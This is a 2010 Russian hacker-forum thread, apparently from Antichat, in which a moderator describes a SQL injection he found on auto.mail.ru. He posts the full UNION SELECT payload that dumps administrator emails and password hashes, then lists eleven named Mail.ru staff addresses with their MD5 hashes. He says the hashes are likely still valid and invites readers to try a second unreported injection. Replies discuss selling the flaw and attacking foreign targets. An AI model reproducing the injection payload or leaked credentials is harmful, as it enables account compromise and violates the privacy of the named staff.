 |
|

09.07.2010, 02:13
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Всем доброго времени суток.
Даже не знаю с чего начать, дык тема старая (в привате нигде ее не было, только в моей голове.).
Статью (если ее так можно назвать) написать уговорил Kusto.
Началось все как обычно у меня всегда все начинается, с поиска xss на mail.ru.
Тыкал с кнопки туда сюда, чувствовал себя исследователем и искал. И на один мой тык по адресу
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//auto.mail.ru/view.html?video_id='1[/COLOR][/COLOR]
мне вывалилась ошибка в sql.
При помощи Уважаемого мною юзера Античата Nemaniak начали мы ее ковырять.
Итого после долгого брута, sql ошибка вылилась в такой вот запрос
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+[/COLOR][/COLOR]
А мы увидели хеш пароля от почты
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]aizikovich[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2e3b8f6d73eb89715150919027e5bf71[/COLOR][COLOR="#007700"]:[/COLOR][/COLOR]
Я сперва подумал, что я добрался до базы админских почтовых ящиков и начал выводить все почтовые ящики перебирая лимит вывода +limit+0,1 (спасибо за подсказку Maniak), но скоро радость закончилась, так как вывести я смог только хеши паролей от 11 админских ящиков.
Осозновая свою ничтожность, а так же осозновая что мне нафиг не нужны ни пароли, ни хеши от админских ящиков, я пришел на Античат и спросил местных знатоков, сколько же все таки может стоит данная уязвимость, если ее попытаться продать (учитывая что ни сама уязвимость, ни результат ее реализации мне нафиг не нужны, так как раскручивали только из чистого любопытства, было интересно в денежном эквиваленте - на сколько мы тогда наковыряли)
Создал тему про стоимость sql на популярных почтовых серверах /thread144589.html и получил ответ от Великого Блэксана (он действительно Великий, просто характер у него такой )
Сообщение от BlackSun
Вообще мы смотрим на вас как на говно ©. Обычная серая масса на ачате и есть школьники
и естественно будучи серой массой (не белой вороной как сейчас), а значит гамном, я далее тему развивать не стал и забыл про эту sql и ее последствия .
На данный момент sql на мейле прикрыта (уже давно), про хеши я думать забыл (пока мне сегодня не напомнили).
Выкладываю и сам sql запрос и выуженные через нее хеши админских паролей.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+[/COLOR][/COLOR]
Код HTML:
aizikovich@mail.ru:2e3b8f6d73eb89715150919027e5bf71:
marat.kanzafarov@mail.ru:116791431a767fdf9321875186683b34:
smolyanov@corp.mail.ru:77ef5dc9edd2d4d764399237b3b59892:
chergik@corp.mail.ru:3e5555700638643f230b98a544f287ad:
kabyshev@corp.mail.ru:dffc7be887f428c3f18a60c8a7d85a14:
aleksey_kovanov@mail.ru:b11871cb1f75cb38a8a401add015734b:
prilutskiy@corp.mail.ru:72b4961d6ed4101abfd09321747d45ba:
gagarin@corp.mail.ru:ab41f00cd7aa00e9b679a2d275
nozhkin@corp.mail.ru:a570bf4990157efc9118f7e38d2cdbbe:
rozhkov@corp.mail.ru:2e36b9903435d5da3815d2d298380f6b:
ysadovnikova@corp.mail.ru:38974963b8b8ea9b2d70c6115b091f64:
Хеши наверное все еще живые, не брутил их. Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил (по ходу я был далеко не первым ) и забил на них.
Потом была еще одна sql инъекция на mail.ru (на поддомене http://sysadmin.mail.ru/).
Щас даже не помню где именно была дырка, но помню что были удачно выведены пароли от одной партнерки мейла (около 10 000 паролей) и так же удачно забыты вместе с самим sql запросом.
Нигде, даже в логах не сохранились ни пароли, ни сам запрос, поэтому дерзайте, может не закрыли еще .
С уважением, Satana-fu
|
|
|

09.07.2010, 02:46
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
Кстати- упросил его я написать статью, чтобы показать что и у крупных поэктов бывают ошибки- почему была раньше не выложенна статья- думаю понимате , думаю что в ближайшем будующем- будут еще темы, и очень хорошо что этот человек не занимается взломами на заказ- иначеб конкурентов у него небыло бы (я просто знаю его возможности)))
P.S. Подтверждаю что данная уязвимость была на самом деле а не в воображении ТС ( поэтому и выкладываеться сейчас-(спустя пол года после ее прикрытия)- чтоб не нанести вред любимому почтовому сервису)
|
|
|

09.07.2010, 03:01
|
|
Познающий
Регистрация: 18.07.2009
Сообщений: 66
С нами:
8850680
Репутация:
10
|
|
>>почему была раньше не выложенна статья- думаю понимате
эм... вероятно вы просто не сидите нигде кромя как здесь. для меня например это жоский баян! в квекве была тема типа: нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.
|
|
|

09.07.2010, 03:02
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
вообще то на приватах есть такой баг, я видал одну но это или другой не помню. Там тоже были проблемы хешами и поддомене мейла. Тока смысл?!
Не думаю что по своим будем стрелят, все таки не красиво
|
|
|

09.07.2010, 03:22
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Сообщение от Romik001
>>почему была раньше не выложенна статья- думаю понимате
эм... вероятно вы просто не сидите нигде кромя как здесь. для меня например это жоский баян! в квекве была тема типа: нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.
Уважаемый,
1. дата этой уязвимости 20.09.2009, да и вообще этой статьи , почти год прошел с тех пор.
2. Вряд ли вы дернете с мейл.ру sql уязвимостью столько мыл/акков, сколько вам угодно. Не пугайте народ.
3. какая связь между авторегером и админскими хешами ?
4. Гульчатай, откройте личико.
5.
Сообщение от None
Хеши наверное все еще живые, не брутил их.
Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил(по ходу я был далеко не первым )
и забил на них.
Выделил, то на что Вам стоило обращать внимание.
|
|
|

09.07.2010, 03:38
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от satana-fu
взлом ящиков мейла, спам по мейл агенту, брут мейла и все такое - красиво, а выкладывание уязвимости, которая потеряла свою актуальность, но имела место быть - некрасиво ???
вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.
PS. я против работе по снг, вот буржуев хот .... мне без разницы.
PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)
|
|
|

09.07.2010, 03:42
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Сообщение от YuNi|[c
вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.
PS. я против работе по снг, вот буржуев хот .... мне без разницы.
PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)
Я им уже отправлял однажды.
Спасибо не сказали, даже не ответили , поэтому я делал ради интереса и забывал. Бог свидетель, что на паблик выложил впервые, и то по просьбе. Про эту тоже не вспомнил бы, если не напомнили бы.
|
|
|

09.07.2010, 03:44
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
Сообщение от YuNi|[c
вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.
PS. я против работе по снг, вот буржуев хот .... мне без разницы.
PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)
Будет Вам и про буржуйские))) но немного попозже))) (там горепрограммеров еще больше чем у нас)))
Сообщение от Romik001
нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.
вот этим ачат и отличается от квекве, что здесь ВСЕ понимают что те циферки после майла- не пароль а лиш хеш его, и автореггер хешами не замениш
(иногда лучше промолчать, чем дать понять что не в теме-НО, вроде бабушки у подьезда говорили что....) Отличаеш глаголы- я уже СЛЫШАЛ и я НАШОЛ????
|
|
|

09.07.2010, 04:57
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
5 ветка была? Случаем не осталась структура? Интересует бд в которой лежала таблица system_admins
|
|
|

09.07.2010, 13:31
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Сообщение от M.W.N.N.
5 ветка была? Случаем не осталась структура? Интересует бд в которой лежала таблица system_admins
ветка вроде как 4-я, потому что базы вроде как брутом брали,
структура и название бд не сохранилось ни у меня, ни у Maniak.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|